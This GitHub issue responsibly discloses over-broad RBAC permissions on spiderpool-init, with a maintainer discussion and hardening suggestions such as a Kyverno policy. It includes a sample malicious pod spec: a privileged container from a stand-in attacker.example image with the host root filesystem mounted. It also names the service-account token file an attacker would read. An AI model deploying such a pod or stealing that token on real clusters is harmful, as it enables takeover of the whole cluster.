
[BUG] Pod spiderpool-init has excessive RBAC permissions which may lead to the whole cluster being hijacked #3420

Open · Yseona opened this issue Apr 29, 2024 · 4 comments
Labels: good first issue, kind/bug, kind/feature


Yseona commented Apr 29, 2024

What would you like to be added?

Hi community! Our team just found a possible security issue while reading the code. We would like to discuss whether it is a real vulnerability.

Description

The bug is that the Pod spiderpool-init in the charts has more RBAC permissions than it needs, which may cause security problems; in the worst case, the whole cluster could be hijacked. The problem is that the service account of spiderpool-init is bound to the shared ClusterRole spiderpool-admin (role.yaml#L5) instead of a separate, dedicated one. This gives spiderpool-init the following sensitive permissions (an illustrative sketch of such rules follows the list below):

  • update verb of the deployments/statefulsets/daemonsets/cronjobs/replicasets/jobs resource (ClusterRole)
  • patch/update verb of the nodes resource (ClusterRole)
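
For illustration, here is a minimal sketch of the kind of ClusterRole rules being flagged. This is a hypothetical excerpt, not the actual contents of role.yaml:

```yaml
# Hypothetical excerpt of a shared admin ClusterRole; illustrative only,
# not the actual role.yaml. The broad write verbs on workloads and nodes
# are the rules at issue.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: spiderpool-admin
rules:
  # Write access to every workload controller in the cluster.
  - apiGroups: ["apps"]
    resources: ["deployments", "statefulsets", "daemonsets", "replicasets"]
    verbs: ["get", "list", "update"]
  - apiGroups: ["batch"]
    resources: ["jobs", "cronjobs"]
    verbs: ["get", "list", "update"]
  # Write access to nodes: enough to change taints and labels cluster-wide.
  - apiGroups: [""]
    resources: ["nodes"]
    verbs: ["get", "list", "patch", "update"]
```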

After reading the source code of spiderpool-init, I didn't find any Kubernetes API calls that use these permissions. However, these unused permissions carry some potential risks:

  • update verb of the deployments/statefulsets/daemonsets/cronjobs/replicasets/jobs resource
    • A malicious user can edit an existing workload to add a privileged container whose image is capable of container escape (see the illustrative pod template after this list). This would allow them to gain root privileges on the worker node where the container is deployed. Since the malicious user controls the pod scheduling parameters (e.g., replica count, node affinity, …), they can deploy the malicious container to every (or almost every) worker node, and thereby control every (or almost every) worker node in the cluster.
  • patch/update verb of the nodes resource
    • This permission allows a malicious user to patch all nodes in the cluster, e.g., changing their taints. This supports the first attack by steering the malicious containers onto specific nodes, and it also lets the attacker force pods with high RBAC permissions onto attacker-controlled nodes.
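
For concreteness, here is a sketch of the kind of pod template an attacker holding these verbs could splice into an existing Deployment. The image name and mount path are made up for illustration:

```yaml
# Hypothetical patch payload; all names below are illustrative.
spec:
  template:
    spec:
      # Tolerate everything so the pod lands on any node; with the nodes
      # patch/update verb, taints themselves could also be rewritten.
      tolerations:
        - operator: "Exists"
      containers:
        - name: escape
          image: attacker.example/escape:latest  # made-up attacker image
          securityContext:
            privileged: true                     # full access to host devices
          volumeMounts:
            - name: host-root
              mountPath: /host                   # host filesystem exposed in-container
      volumes:
        - name: host-root
          hostPath:
            path: /
```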

A malicious user only needs to obtain the service account token to perform the above attacks. Several ways to achieve this have already been reported in the real world:

  • Supply chain attacks: like the recent xz backdoor. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
  • RCE vulnerability in the application: any remote-code-execution vulnerability that can read local files can achieve this.

Mitigation Suggestion

  • Create a separate role for spiderpool-init and remove all the unnecessary permissions.
  • Write a Kyverno or OPA/Gatekeeper policy (a Kyverno sketch follows this list) to:
    • Limit the container image, entrypoint, and command of newly created pods. This would effectively prevent the creation of malicious containers.
    • Restrict the securityContext of newly created pods, especially enforcing that securityContext.privileged and securityContext.allowPrivilegeEscalation are false. This would prevent the attacker from escaping the malicious container. On older Kubernetes versions, PodSecurityPolicy can also be used to achieve this (deprecated in v1.21 and removed in v1.25).
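
As a sketch of the second suggestion, a minimal Kyverno ClusterPolicy enforcing the securityContext fields mentioned above (this assumes Kyverno is installed; the policy name and message are illustrative):

```yaml
# Minimal Kyverno sketch; assumes Kyverno is installed in the cluster.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-containers  # illustrative name
spec:
  validationFailureAction: Enforce      # reject non-compliant pods
  rules:
    - name: deny-privileged
      match:
        any:
          - resources:
              kinds:
                - Pod
      validate:
        message: "privileged and allowPrivilegeEscalation must be false"
        pattern:
          spec:
            containers:
              # =() means: if the field is present, it must match.
              - =(securityContext):
                  =(privileged): "false"
                  =(allowPrivilegeEscalation): "false"
```

A production policy would also need to cover initContainers and ephemeralContainers, and the image/entrypoint restrictions from the first sub-bullet would go in a separate rule.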

A Few Questions

  • Are these permissions really unused by spiderpool-init?
  • Would these mitigation suggestions be applicable to spiderpool?
  • Our team has also found other unnecessary permissions (not as sensitive as the above, but they could still cause security issues). Please tell us if you are interested; we would be happy to share them or PR a fix.

References

Several CVEs have already been assigned in other projects for similar issues.

Reporter

kaaass (@kaaass)
Yseona (@Yseona)

Why is this needed?

None

How to implement it (if possible)?

None

Additional context

None

@cyclinder (Collaborator) commented

Hello @Yseona, thanks for the report! It looks like this issue is a duplicate of #3361.

Are you interested in fixing this? If not, I will send a PR for this!


kaaass commented Apr 30, 2024

@cyclinder Hi! I'm interested in this and would be glad to PR a fix. Could I be assigned to the issue?

@cyclinder (Collaborator) commented

Hi @kaaass! Sure, I've assigned it to you! Feel free to ask me if you need any help. :)

@cyclinder cyclinder assigned cyclinder and kaaass and unassigned cyclinder Apr 30, 2024
@cyclinder cyclinder added the good first issue label Apr 30, 2024
@cyclinder (Collaborator) commented

Hi @kaaass, are you still interested in fixing this issue? No push, just an ack.
